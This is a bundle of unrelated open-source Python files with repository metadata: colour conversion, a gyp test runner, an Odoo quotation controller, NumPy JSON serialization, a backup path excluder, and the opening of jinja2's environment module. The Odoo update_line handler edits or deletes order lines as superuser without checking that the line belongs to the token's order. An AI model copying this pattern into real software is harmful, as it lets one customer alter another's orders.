        dAB = self.getDistanceBetweenTwoPoints(xyPoint, pAB)
        dAC = self.getDistanceBetweenTwoPoints(xyPoint, pAC)
        dBC = self.getDistanceBetweenTwoPoints(xyPoint, pBC)

        lowest = dAB
        closestPoint = pAB

        if (dAC < lowest):
            lowest = dAC
            closestPoint = pAC

        if (dBC < lowest):
            lowest = dBC
            closestPoint = pBC

        # Change the xy value to a value which is within the reach of the lamp.
        cx = closestPoint.x
        cy = closestPoint.y

        return XYPoint(cx, cy)

    def getDistanceBetweenTwoPoints(self, one, two):
        """Returns the Euclidean distance between two XYPoints."""
        dx = one.x - two.x
        dy = one.y - two.y
        return math.sqrt(dx * dx + dy * dy)

    def getXYPointFromRGB(self, red, green, blue):
        """Returns an XYPoint object containing the closest available CIE 1931
        coordinates based on the RGB input values (0..255 channel integers)."""
        # BUG FIX: the sRGB inverse-gamma threshold (0.04045) below is defined
        # for channel values in the 0..1 range, yet every caller in this file
        # passes 0..255 integers (hexToRGB, randomRGBValue).  Normalize first
        # so the linear/exponential branch is actually selected correctly.
        red, green, blue = red / 255.0, green / 255.0, blue / 255.0

        r = ((red + 0.055) / (1.0 + 0.055))**2.4 if (red > 0.04045) else (red / 12.92)
        g = ((green + 0.055) / (1.0 + 0.055))**2.4 if (green > 0.04045) else (green / 12.92)
        b = ((blue + 0.055) / (1.0 + 0.055))**2.4 if (blue > 0.04045) else (blue / 12.92)

        # Linear RGB -> XYZ (Wide RGB D65 matrix, per the Hue SDK docs).
        X = r * 0.4360747 + g * 0.3850649 + b * 0.0930804
        Y = r * 0.2225045 + g * 0.7168786 + b * 0.0406169
        Z = r * 0.0139322 + g * 0.0971045 + b * 0.7141733

        # Pure black has no chromaticity; avoid a ZeroDivisionError.
        if X + Y + Z == 0:
            cx = cy = 0
        else:
            cx = X / (X + Y + Z)
            cy = Y / (X + Y + Z)

        # Check if the given XY value is within the colourreach of our lamps.
        xyPoint = XYPoint(cx, cy)
        inReachOfLamps = self.checkPointInLampsReach(xyPoint)

        if not inReachOfLamps:
            xyPoint = self.getClosestPointToPoint(xyPoint)

        return xyPoint

    def getRGBFromXYAndBrightness(self, x, y, bri=1):
        """Returns a rgb tuplet for given x, y values.  Not actually an inverse of
        `getXYPointFromRGB`.  Implementation of the instructions found on the
        Philips Hue iOS SDK docs: http://goo.gl/kWKXKl
        """
        # The xy to color conversion is almost the same, but in reverse order.
        # Check if the xy value is within the color gamut of the lamp.
        # If not continue with step 2, otherwise step 3.
        # We do this to calculate the most accurate color the given light can
        # actually do.
        xyPoint = XYPoint(x, y)

        if not self.checkPointInLampsReach(xyPoint):
            # Calculate the closest point on the color gamut triangle
            # and use that as xy value See step 6 of color to xy.
            xyPoint = self.getClosestPointToPoint(xyPoint)

        # Calculate XYZ values Convert using the following formulas:
        # NOTE(review): divides by xyPoint.y with no zero guard; a caller
        # passing y == 0 (e.g. exact gamut-Blue-adjacent input) would raise.
        Y = bri
        X = (Y / xyPoint.y) * xyPoint.x
        Z = (Y / xyPoint.y) * (1 - xyPoint.x - xyPoint.y)

        # Convert to RGB using Wide RGB D65 conversion.
        r = X * 1.612 - Y * 0.203 - Z * 0.302
        g = -X * 0.509 + Y * 1.412 + Z * 0.066
        b = X * 0.026 - Y * 0.072 + Z * 0.962

        # Apply reverse gamma correction.
        r, g, b = map(
            lambda x: (12.92 * x) if (x <= 0.0031308) else ((1.0 + 0.055) * pow(x, (1.0 / 2.4)) - 0.055),
            [r, g, b]
        )

        # Bring all negative components to zero.
        r, g, b = map(lambda x: max(0, x), [r, g, b])

        # If one component is greater than 1, weight components by that value.
        max_component = max(r, g, b)
        if max_component > 1:
            r, g, b = map(lambda x: x / max_component, [r, g, b])

        r, g, b = map(lambda x: int(x * 255), [r, g, b])

        return (r, g, b)


class Converter:
    """High-level hex/RGB <-> CIE 1931 conversion facade."""

    color = ColorHelper()

    def hexToCIE1931(self, h):
        """Converts hexadecimal colors represented as a String to approximate
        CIE 1931 coordinates.  May not produce accurate values."""
        rgb = self.color.hexToRGB(h)
        return self.rgbToCIE1931(rgb[0], rgb[1], rgb[2])

    def rgbToCIE1931(self, red, green, blue):
        """Converts red, green and blue integer values (0..255) to approximate
        CIE 1931 x and y coordinates.  Algorithm from:
        http://www.easyrgb.com/index.php?X=MATH&H=02#text2.
        May not produce accurate values.
        """
        point = self.color.getXYPointFromRGB(red, green, blue)
        return [point.x, point.y]

    def getCIEColor(self, hexColor=None):
        """Returns the approximate CIE 1931 x, y coordinates represented by the
        supplied hexColor parameter, or of a random color if the parameter
        is not passed.  The point of this function is to let people set a
        lamp's color to any random color.  Arguably this should be
        implemented elsewhere."""
        xy = []
        if hexColor:
            xy = self.hexToCIE1931(hexColor)
        else:
            r = self.color.randomRGBValue()
            g = self.color.randomRGBValue()
            b = self.color.randomRGBValue()
            xy = self.rgbToCIE1931(r, g, b)

        return xy

    def CIE1931ToHex(self, x, y, bri=1):
        """Converts CIE 1931 x and y coordinates and brightness value from 0 to 1
        to a CSS hex color."""
        r, g, b = self.color.getRGBFromXYAndBrightness(x, y, bri)
        return self.color.rgbToHex(r, g, b)
mit
carlTLR/gyp
test/small/gyptest-small.py
205
1477
#!/usr/bin/env python

# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""Runs small tests."""

import imp
import os
import sys
import unittest

import TestGyp


test = TestGyp.TestGyp()

# Make pylib importable so the test modules can resolve their dependencies.
# This mirrors the sys.path manipulation done at the top of the main "gyp"
# file.
sys.path.append(os.path.join(test._cwd, 'pylib'))

# Add new test suites here.
files_to_test = [
  'pylib/gyp/MSVSSettings_test.py',
  'pylib/gyp/easy_xml_test.py',
  'pylib/gyp/generator/msvs_test.py',
  'pylib/gyp/generator/ninja_test.py',
  'pylib/gyp/generator/xcode_test.py',
  'pylib/gyp/common_test.py',
  'pylib/gyp/input_test.py',
]


def _load_suite(path):
  """Load one test file as a module and return its unittest suite."""
  # The module name is the file name without directory or extension.
  module_name = os.path.splitext(os.path.basename(path))[0]
  module = imp.load_source(module_name, os.path.join(test._cwd, path))
  return unittest.defaultTestLoader.loadTestsFromModule(module)


# Collect every file's suite into one combined suite and run it.
combined = unittest.TestSuite(_load_suite(f) for f in files_to_test)
result = unittest.TextTestRunner(verbosity=2).run(combined)

# Report the aggregate outcome through the TestGyp harness.
if result.failures or result.errors:
  test.fail_test()
test.pass_test()
bsd-3-clause
BT-fgarbely/odoo
addons/website_quote/controllers/main.py
83
8996
# -*- coding: utf-8 -*-
##############################################################################
#
#    OpenERP, Open Source Management Solution
#    Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>).
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as
#    published by the Free Software Foundation, either version 3 of the
#    License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################

from openerp import SUPERUSER_ID
from openerp.addons.web import http
from openerp.addons.web.http import request
import werkzeug
import datetime
import time

from openerp.tools.translate import _


class sale_quote(http.Controller):
    """Website controller for the online quotation pages.

    Public (not logged-in) visitors are only granted access to an order
    when the URL carries the order's private ``access_token``; in that
    case the ORM calls below are made as SUPERUSER_ID to bypass normal
    access rules.  Old-style Odoo 8 API (cr/uid/registry) throughout.
    """

    @http.route([
        "/quote/<int:order_id>",
        "/quote/<int:order_id>/<token>"
    ], type='http', auth="public", website=True)
    def view(self, order_id, token=None, message=False, **post):
        """Render the quotation page for one sale order.

        Without a token, the order is read with the visitor's own uid
        (normal access rules apply).  With a token, SUPERUSER_ID is used
        and the token is checked against the order's access_token.
        """
        # use SUPERUSER_ID allow to access/view order for public user
        # only if he knows the private token
        order = request.registry.get('sale.order').browse(request.cr, token and SUPERUSER_ID or request.uid, order_id, request.context)
        now = time.strftime('%Y-%m-%d')
        if token:
            if token != order.access_token:
                return request.website.render('website.404')
            # Log the "viewed by customer" chatter message only once a day,
            # using the session as the de-duplication marker.
            if request.session.get('view_quote', False) != now:
                request.session['view_quote'] = now
                body = _('Quotation viewed by customer')
                self.__message_post(body, order_id, type='comment')
        # days_valid: days left before the validity date expires (inclusive).
        days = 0
        if order.validity_date:
            days = (datetime.datetime.strptime(order.validity_date, '%Y-%m-%d') - datetime.datetime.now()).days + 1
        values = {
            'quotation': order,
            'message': message and int(message) or False,
            # True when at least one option has not been turned into an
            # order line yet (Python 2: filter() returns a list here).
            'option': bool(filter(lambda x: not x.line_id, order.options)),
            # String comparison works because both are ISO 'YYYY-MM-DD'.
            'order_valid': (not order.validity_date) or (now <= order.validity_date),
            'days_valid': days,
        }
        return request.website.render('website_quote.so_quotation', values)

    @http.route(['/quote/accept'], type='json', auth="public", website=True)
    def accept(self, order_id, token=None, signer=None, sign=None, **post):
        """Customer accepts the quote: confirm the order and log the signature.

        ``sign`` is an optional base64-encoded PNG of the drawn signature
        (Python 2 str.decode('base64')); it is attached to the chatter
        message rather than stored on the order itself.
        """
        order_obj = request.registry.get('sale.order')
        order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
        if token != order.access_token:
            return request.website.render('website.404')
        attachments = sign and [('signature.png', sign.decode('base64'))] or []
        order_obj.signal_workflow(request.cr, SUPERUSER_ID, [order_id], 'order_confirm', context=request.context)
        message = _('Order signed by %s') % (signer,)
        self.__message_post(message, order_id, type='comment', subtype='mt_comment', attachments=attachments)
        return True

    @http.route(['/quote/<int:order_id>/<token>/decline'], type='http', auth="public", website=True)
    def decline(self, order_id, token, **post):
        """Customer declines the quote: cancel the order, log the optional
        reason, and redirect back to the quote page (message=2 banner)."""
        order_obj = request.registry.get('sale.order')
        order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
        if token != order.access_token:
            return request.website.render('website.404')
        request.registry.get('sale.order').action_cancel(request.cr, SUPERUSER_ID, [order_id])
        message = post.get('decline_message')
        if message:
            self.__message_post(message, order_id, type='comment', subtype='mt_comment')
        return werkzeug.utils.redirect("/quote/%s/%s?message=2" % (order_id, token))

    @http.route(['/quote/<int:order_id>/<token>/post'], type='http', auth="public", website=True)
    def post(self, order_id, token, **post):
        """Post a customer comment on the order's chatter, then redirect
        back to the quote page (message=1 banner)."""
        # use SUPERUSER_ID allow to access/view order for public user
        order_obj = request.registry.get('sale.order')
        order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
        message = post.get('comment')
        if token != order.access_token:
            return request.website.render('website.404')
        if message:
            self.__message_post(message, order_id, type='comment', subtype='mt_comment')
        return werkzeug.utils.redirect("/quote/%s/%s?message=1" % (order_id, token))

    def __message_post(self, message, order_id, type='comment', subtype=False, attachments=[]):
        """Post ``message`` on the sale order's chatter as the current user.

        The body is round-tripped through the session before posting.
        NOTE(review): ``type`` shadows the builtin and ``attachments=[]``
        is a mutable default — kept as-is; the list is never mutated here
        and the keyword names match the Odoo 8 message_post API.
        """
        request.session.body = message
        cr, uid, context = request.cr, request.uid, request.context
        # Author attribution: resolve the *current* uid's partner, even
        # though the post itself is done as SUPERUSER_ID.
        user = request.registry['res.users'].browse(cr, SUPERUSER_ID, uid, context=context)
        if 'body' in request.session and request.session.body:
            request.registry.get('sale.order').message_post(cr, SUPERUSER_ID, order_id,
                    body=request.session.body,
                    type=type,
                    subtype=subtype,
                    author_id=user.partner_id.id,
                    context=context,
                    attachments=attachments
                )
            # Clear the marker so the same body is not posted twice.
            request.session.body = False
        return True

    @http.route(['/quote/update_line'], type='json', auth="public", website=True)
    def update(self, line_id, remove=False, unlink=False, order_id=None, token=None, **post):
        """Adjust an order line's quantity from the quote page.

        ``remove`` decrements by one, otherwise increments by one;
        ``unlink`` deletes the line entirely.  Only allowed while the
        order is still in draft/sent state.
        Returns [new quantity, new order total] as strings, or False.
        """
        order = request.registry.get('sale.order').browse(request.cr, SUPERUSER_ID, int(order_id))
        if token != order.access_token:
            return request.website.render('website.404')
        if order.state not in ('draft', 'sent'):
            return False
        line_id = int(line_id)
        if unlink:
            request.registry.get('sale.order.line').unlink(request.cr, SUPERUSER_ID, [line_id], context=request.context)
            return False
        number = (remove and -1 or 1)
        order_line_obj = request.registry.get('sale.order.line')
        order_line_val = order_line_obj.read(request.cr, SUPERUSER_ID, [line_id], [], context=request.context)[0]
        quantity = order_line_val['product_uom_qty'] + number
        order_line_obj.write(request.cr, SUPERUSER_ID, [line_id], {'product_uom_qty': (quantity)}, context=request.context)
        return [str(quantity), str(order.amount_total)]

    @http.route(["/quote/template/<model('sale.quote.template'):quote>"], type='http', auth="user", website=True)
    def template_view(self, quote, **post):
        """Preview a quotation template (back-end users only: auth="user")."""
        values = {'template': quote}
        return request.website.render('website_quote.so_template', values)

    @http.route(["/quote/add_line/<int:option_id>/<int:order_id>/<token>"], type='http', auth="public", website=True)
    def add(self, option_id, order_id, token, **post):
        """Turn a proposed option into a real order line on the quote."""
        vals = {}
        order = request.registry.get('sale.order').browse(request.cr, SUPERUSER_ID, order_id)
        if token != order.access_token:
            return request.website.render('website.404')
        if order.state not in ['draft', 'sent']:
            return request.website.render('website.http_error', {'status_code': 'Forbidden', 'status_message': _('You cannot add options to a confirmed order.')})
        option_obj = request.registry.get('sale.order.option')
        option = option_obj.browse(request.cr, SUPERUSER_ID, option_id)
        # Run the standard onchange to get defaults (taxes, etc.) for the
        # product, then overlay the option's own price/description/qty.
        res = request.registry.get('sale.order.line').product_id_change(request.cr, SUPERUSER_ID, order_id,
            False, option.product_id.id, option.quantity, option.uom_id.id, option.quantity, option.uom_id.id,
            option.name, order.partner_id.id, False, True, time.strftime('%Y-%m-%d'), False,
            order.fiscal_position.id, True, dict(request.context or {}, company_id=order.company_id.id))
        vals = res.get('value', {})
        # Many2many tax field needs the (6, 0, ids) "replace" command form.
        if 'tax_id' in vals:
            vals['tax_id'] = [(6, 0, vals['tax_id'])]
        vals.update({
            'price_unit': option.price_unit,
            'website_description': option.website_description,
            'name': option.name,
            'order_id': order.id,
            'product_id': option.product_id.id,
            'product_uos_qty': option.quantity,
            'product_uos': option.uom_id.id,
            'product_uom_qty': option.quantity,
            'product_uom': option.uom_id.id,
            'discount': option.discount,
        })
        line = request.registry.get('sale.order.line').create(request.cr, SUPERUSER_ID, vals, context=request.context)
        # Link the option to its new line so it is no longer shown as pending.
        option_obj.write(request.cr, SUPERUSER_ID, [option.id], {'line_id': line}, context=request.context)
        return werkzeug.utils.redirect("/quote/%s/%s#pricing" % (order.id, token))
agpl-3.0
marmarko/ml101
tensorflow/examples/tutorials/mnist/input_data.py
165
1107
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Functions for downloading and reading MNIST data.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import gzip import os import tempfile import numpy from six.moves import urllib from six.moves import xrange # pylint: disable=redefined-builtin import tensorflow as tf from tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets
bsd-2-clause
darcamo/pyphysim
pyphysim/util/serialize.py
1
5985
#!/usr/bin/env python
"""
Module containing function related to serialization.
"""

import json
from typing import Any, Dict, Union, cast

import numpy as np

# Types this module knows how to (de)serialize to/from JSON.
Serializable = Union[np.ndarray, np.int32, np.int64, np.float32, np.float64,
                     np.float128, set]

# A type corresponding to the JSON representation of the object. For a lack of
# a better option we use Any
JsonRepresentation = Any


class NumpyOrSetEncoder(json.JSONEncoder):
    """
    JSON encoder for numpy arrays.

    Pass this class to json.dumps when converting a dictionary to json so
    that any field which with a numpy array as value will be properly
    converted.

    This encoder will also handle numpy scalars and the native python set
    types.

    When you need to convert the json representation back, use the
    `json_numpy_or_set_obj_hook` function.

    See Also
    --------
    json_numpy_or_set_obj_hook
    """
    def default(self, obj: Serializable) -> JsonRepresentation:
        """
        If input object is an ndarray it will be converted into a dict
        holding data, dtype, _is_numpy_array and shape.

        Parameters
        ----------
        obj : Serializable

        Returns
        -------
        Serialized Data
        """
        # Case for numpy arrays: store enough metadata (dtype) so the
        # decoder can faithfully reconstruct the array.
        if isinstance(obj, np.ndarray):
            return {
                'data': obj.tolist(),
                'dtype': str(obj.dtype),
                '_is_numpy_array': True,
                'shape': obj.shape
            }
        # Case for numpy integer scalars
        if isinstance(obj, (np.int32, np.int64)):
            return int(obj)
        # Case for numpy float scalars.
        # BUG FIX: this previously returned int(obj), silently truncating
        # the fractional part of every serialized float scalar.
        if isinstance(obj, (np.float32, np.float64, np.float128)):
            return float(obj)
        # Case for built-in Python sets
        if isinstance(obj, set):
            return {'data': list(obj), '_is_set': True}
        # If it is not one of the handled types fall back to the base class.
        # BUG FIX: this previously called json.JSONEncoder(self, obj), which
        # *constructs* a new encoder (and recurses forever) instead of
        # delegating to the base implementation that raises TypeError.
        return json.JSONEncoder.default(self, obj)


def json_numpy_or_set_obj_hook(
        dct: Dict[str, JsonRepresentation]) -> Serializable:
    """
    Decodes a previously encoded numpy array.

    Parameters
    ----------
    dct : dict
        The JSON encoded numpy array.

    Returns
    -------
    np.ndarray | set | dict, optional
        The decoded numpy array or None if the encoded json data was not an
        encoded numpy array.

    See Also
    --------
    NumpyOrSetEncoder
    """
    if isinstance(dct, dict) and '_is_numpy_array' in dct:
        if dct['_is_numpy_array'] is True:
            # Restore the stored dtype when present so the round-trip is
            # faithful (previously the dtype was written but ignored here);
            # None falls back to numpy's default inference.
            return np.array(dct['data'], dtype=dct.get('dtype'))
        raise ValueError(  # pragma: no cover
            'Json representation contains the "_is_numpy_array" key '
            'indicating that the object should be a numpy array, but it '
            'was set to False, which is not valid.')
    if isinstance(dct, dict) and '_is_set' in dct:
        if dct['_is_set'] is True:
            return set(dct['data'])
        raise ValueError(  # pragma: no cover
            'Json representation contains the "_is_set" key '
            'indicating that the object should be python set, but it '
            'was set to False, which is not valid.')
    # Not one of our encoded markers -> pass the dict through unchanged.
    return dct


class JsonSerializable:
    """
    Base class for classes you want to be JSON serializable (convert
    to/from JSON).

    You can call the methods `to_json` and `from_json` methods (the later
    is a staticmethod).

    Note that a subclass must implement the `_to_dict` and `_from_dict`
    methods.
    """
    def _to_dict(self) -> Any:
        """
        Convert the object to a dictionary representation.

        Returns
        -------
        dict
            The dictionary representation of the object.
        """
        raise NotImplementedError(
            "Implement in a subclass")  # pragma: no cover

    def to_dict(self) -> Dict[str, Any]:
        """
        Convert the object to a dictionary representation.

        Returns
        -------
        dict
            The dictionary representation of the object.
        """
        return cast(Dict[str, Any], self._to_dict())

    @staticmethod
    def _from_dict(d: Any) -> Any:
        """
        Convert from a dictionary to an object.

        Parameters
        ----------
        d : dict
            The dictionary representing the object.

        Returns
        -------
        Result
            The converted object.
        """
        raise NotImplementedError(
            "Implement in a subclass")  # pragma: no cover

    @classmethod
    def from_dict(cls, d: Dict[str, Any]) -> Any:
        """
        Convert from a dictionary to an object.

        Parameters
        ----------
        d : dict
            The dictionary representing the Result.

        Returns
        -------
        Result
            The converted object.
        """
        return cls._from_dict(d)

    def to_json(self) -> JsonRepresentation:
        """
        Convert the object to JSON.

        Returns
        -------
        str
            JSON representation of the object.
        """
        return json.dumps(self._to_dict(), cls=NumpyOrSetEncoder)

    @classmethod
    def from_json(cls, data: JsonRepresentation) -> Any:
        """
        Convert a JSON representation of the object to an actual object.

        Parameters
        ----------
        data : str
            The JSON representation of the object.

        Returns
        -------
        any
            The actual object
        """
        d = json.loads(data, object_hook=json_numpy_or_set_obj_hook)
        return cls._from_dict(d)


# xxxxxxxxxx Test and Example Usage xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# if __name__ == '__main__':
#     expected = np.arange(100, dtype=np.float)
#     dumped = json.dumps(expected, cls=NumpyOrSetEncoder)
#     result = json.loads(dumped, object_hook=json_numpy_or_set_obj_hook)
#     print(type(result))
#     print(result)
gpl-2.0
kishikawakatsumi/Mozc-for-iOS
src/dictionary/__init__.py
1
1582
# -*- coding: utf-8 -*- # Copyright 2010-2014, Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. __author__ = "hidehiko"
apache-2.0
obnam-mirror/obnam
obnamlib/pathname_excluder.py
5
1610
# Copyright (C) 2015 Lars Wirzenius
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.


import re


class PathnameExcluder(object):

    '''Decide which pathnames to exclude from a backup.

    Exclusion and inclusion patterns are regular expressions matched
    anywhere in the pathname (re.search).  Inclusion patterns win over
    exclusion patterns; within each list, the first matching pattern
    (in registration order) is reported.
    '''

    def __init__(self):
        # Each entry is a (source-text, compiled-pattern) pair so we can
        # report back which pattern matched.
        self._include_patterns = []
        self._exclude_patterns = []

    def exclude_regexp(self, regexp):
        self._exclude_patterns.append((regexp, re.compile(regexp)))

    def allow_regexp(self, regexp):
        self._include_patterns.append((regexp, re.compile(regexp)))

    def exclude(self, pathname):
        '''Should pathname be excluded?

        Returns a pair (excluded, regexp): regexp is the pattern text
        that decided the outcome, or None when nothing matched.
        '''
        allowed_by = self._first_match(pathname, self._include_patterns)
        if allowed_by:
            return False, allowed_by
        denied_by = self._first_match(pathname, self._exclude_patterns)
        if denied_by:
            return True, denied_by
        return False, None

    def _first_match(self, pathname, patterns):
        # Return the source text of the first pattern matching pathname.
        return next(
            (regexp for regexp, compiled in patterns
             if compiled.search(pathname)),
            None)
gpl-3.0
danakj/chromium
third_party/jinja2/environment.py
614
47244
# -*- coding: utf-8 -*- """ jinja2.environment ~~~~~~~~~~~~~~~~~~ Provides a class that holds runtime and parsing time options. :copyright: (c) 2010 by the Jinja Team. :license: BSD, see LICENSE for more details. """ import os import sys from jinja2 import nodes from jinja2.defaults import BLOCK_START_STRING, \ BLOCK_END_STRING, VARIABLE_START_STRING, VARIABLE_END_STRING, \ COMMENT_START_STRING, COMMENT_END_STRING, LINE_STATEMENT_PREFIX, \ LINE_COMMENT_PREFIX, TRIM_BLOCKS, NEWLINE_SEQUENCE, \ DEFAULT_FILTERS, DEFAULT_TESTS, DEFAULT_NAMESPACE, \ KEEP_TRAILING_NEWLINE, LSTRIP_BLOCKS from jinja2.lexer import get_lexer, TokenStream from jinja2.parser import Parser from jinja2.nodes import EvalContext from jinja2.optimizer import optimize from jinja2.compiler import generate from jinja2.runtime import Undefined, new_context from jinja2.exceptions import TemplateSyntaxError, TemplateNotFound, \ TemplatesNotFound, TemplateRuntimeError from jinja2.utils import import_string, LRUCache, Markup, missing, \ concat, consume, internalcode from jinja2._compat import imap, ifilter, string_types, iteritems, \ text_type, reraise, implements_iterator, implements_to_string, \ get_next, encode_filename, PY2, PYPY from functools import reduce # for direct template usage we have up to ten living environments _spontaneous_environments = LRUCache(10) # the function to create jinja traceback objects. This is dynamically # imported on the first exception in the exception handler. _make_traceback = None def get_spontaneous_environment(*args): """Return a new spontaneous environment. A spontaneous environment is an unnamed and unaccessible (in theory) environment that is used for templates generated from a string and not from the file system. 
""" try: env = _spontaneous_environments.get(args) except TypeError: return Environment(*args) if env is not None: return env _spontaneous_environments[args] = env = Environment(*args) env.shared = True return env def create_cache(size): """Return the cache class for the given size.""" if size == 0: return None if size < 0: return {} return LRUCache(size) def copy_cache(cache): """Create an empty copy of the given cache.""" if cache is None: return None elif type(cache) is dict: return {} return LRUCache(cache.capacity) def load_extensions(environment, extensions): """Load the extensions from the list and bind it to the environment. Returns a dict of instantiated environments. """ result = {} for extension in extensions: if isinstance(extension, string_types): extension = import_string(extension) result[extension.identifier] = extension(environment) return result def _environment_sanity_check(environment): """Perform a sanity check on the environment.""" assert issubclass(environment.undefined, Undefined), 'undefined must ' \ 'be a subclass of undefined because filters depend on it.' assert environment.block_start_string != \ environment.variable_start_string != \ environment.comment_start_string, 'block, variable and comment ' \ 'start strings must be different' assert environment.newline_sequence in ('\r', '\r\n', '\n'), \ 'newline_sequence set to unknown line ending string.' return environment class Environment(object): r"""The core component of Jinja is the `Environment`. It contains important shared variables like configuration, filters, tests, globals and others. Instances of this class may be modified if they are not shared and if no template was loaded so far. Modifications on environments after the first template was loaded will lead to surprising effects and undefined behavior. Here the possible initialization parameters: `block_start_string` The string marking the begin of a block. Defaults to ``'{%'``. 
`block_end_string` The string marking the end of a block. Defaults to ``'%}'``. `variable_start_string` The string marking the begin of a print statement. Defaults to ``'{{'``. `variable_end_string` The string marking the end of a print statement. Defaults to ``'}}'``. `comment_start_string` The string marking the begin of a comment. Defaults to ``'{#'``. `comment_end_string` The string marking the end of a comment. Defaults to ``'#}'``. `line_statement_prefix` If given and a string, this will be used as prefix for line based statements. See also :ref:`line-statements`. `line_comment_prefix` If given and a string, this will be used as prefix for line based based comments. See also :ref:`line-statements`. .. versionadded:: 2.2 `trim_blocks` If this is set to ``True`` the first newline after a block is removed (block, not variable tag!). Defaults to `False`. `lstrip_blocks` If this is set to ``True`` leading spaces and tabs are stripped from the start of a line to a block. Defaults to `False`. `newline_sequence` The sequence that starts a newline. Must be one of ``'\r'``, ``'\n'`` or ``'\r\n'``. The default is ``'\n'`` which is a useful default for Linux and OS X systems as well as web applications. `keep_trailing_newline` Preserve the trailing newline when rendering templates. The default is ``False``, which causes a single newline, if present, to be stripped from the end of the template. .. versionadded:: 2.7 `extensions` List of Jinja extensions to use. This can either be import paths as strings or extension classes. For more information have a look at :ref:`the extensions documentation <jinja-extensions>`. `optimized` should the optimizer be enabled? Default is `True`. `undefined` :class:`Undefined` or a subclass of it that is used to represent undefined values in the template. `finalize` A callable that can be used to process the result of a variable expression before it is output. For example one can convert `None` implicitly into an empty string here. 
`autoescape` If set to true the XML/HTML autoescaping feature is enabled by default. For more details about auto escaping see :class:`~jinja2.utils.Markup`. As of Jinja 2.4 this can also be a callable that is passed the template name and has to return `True` or `False` depending on autoescape should be enabled by default. .. versionchanged:: 2.4 `autoescape` can now be a function `loader` The template loader for this environment. `cache_size` The size of the cache. Per default this is ``50`` which means that if more than 50 templates are loaded the loader will clean out the least recently used template. If the cache size is set to ``0`` templates are recompiled all the time, if the cache size is ``-1`` the cache will not be cleaned. `auto_reload` Some loaders load templates from locations where the template sources may change (ie: file system or database). If `auto_reload` is set to `True` (default) every time a template is requested the loader checks if the source changed and if yes, it will reload the template. For higher performance it's possible to disable that. `bytecode_cache` If set to a bytecode cache object, this object will provide a cache for the internal Jinja bytecode so that templates don't have to be parsed if they were not changed. See :ref:`bytecode-cache` for more information. """ #: if this environment is sandboxed. Modifying this variable won't make #: the environment sandboxed though. For a real sandboxed environment #: have a look at jinja2.sandbox. This flag alone controls the code #: generation by the compiler. sandboxed = False #: True if the environment is just an overlay overlayed = False #: the environment this environment is linked to if it is an overlay linked_to = None #: shared environments have this set to `True`. A shared environment #: must not be modified shared = False #: these are currently EXPERIMENTAL undocumented features. 
